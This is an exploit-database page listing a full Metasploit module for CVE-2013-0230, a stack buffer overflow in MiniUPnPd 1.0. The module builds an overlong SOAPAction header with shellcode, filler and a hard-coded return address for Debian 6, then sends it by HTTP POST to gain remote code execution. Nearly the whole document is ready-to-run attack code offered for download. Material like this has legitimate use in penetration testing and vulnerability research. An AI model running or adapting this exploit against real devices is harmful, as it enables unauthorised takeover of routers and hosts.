MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution



EKU-ID: 3267 CVE: 2013-0230 OSVDB-ID: 89624
Author: Dejan Lukan Published: 2013-06-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
      'Description'    => %q{
          This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
        present in the SOAPAction HTTP header handling.
      },
      'Author'         =>
        [
          'hdm', # Vulnerability discovery
          'Dejan Lukan' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'EXITFUNC' => 'process', },
      # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
      # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
      # of the program is never reached)
      'Payload'        =>
        {
          'Space' => 2060,
          'BadChars' => "\x00\x22",
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'References'     =>
        [
          [ 'CVE', '2013-0230' ],
          [ 'OSVDB', '89624' ],
          [ 'BID', '57608' ],
          [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
        ],
      'Targets'        =>
        [
          [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
            {
              'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
              'Offset' => 2123
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 27 2013',
    ))

    register_options([
      Opt::RPORT(5555),
    ], self.class)
  end

  def exploit
    #
    # Build the SOAP Exploit
    #
    # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
    sploit  = "\xeb\x2d"

    # a valid action
    sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"

    # payload
    sploit += payload.encoded

    # nops
    sploit += rand_text(target['Offset'] - sploit.length - 16)

    # overwrite registers on stack: the values are not used, so we can overwrite them with anything
    sploit += rand_text(4)     # overwrite EBX
    sploit += rand_text(4)     # overwrite ESI
    sploit += rand_text(4)     # overwrite EDI
    sploit += rand_text(4)     # overwrite EBP

    # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
    # stack points directly to the string after 'Soapaction: ', which is why we must
    # throw the first value on the stack away, which we're doing with the pop ebp
    # instruction. Then we're returning to the next value on the stack, which is
    # exactly the address that we want.
    sploit += [target.ret].pack('V')

    # the ending " character is necessary for the vulnerability to be reached
    sploit += "\""

    # data sent in the POST body
    data =
      "<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
      "<SOAP-ENV:Envelope\r\n" +
      "  SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      "  xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
      "  xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
      ">\r\n" +
      "<SOAP-ENV:Body>\r\n" +
      "<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
      "</ns1:action>\r\n" +
      "</SOAP-ENV:Body>\r\n" +
      "</SOAP-ENV:Envelope>\r\n"

    #
    # Build and send the HTTP request
    #
    print_status("Sending exploit to victim #{target.name} at ...")
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/",
      'headers' => {
        'SOAPAction' => sploit,
      },
      'data'    => data,
    })

    # disconnect from the server
    disconnect
  end
end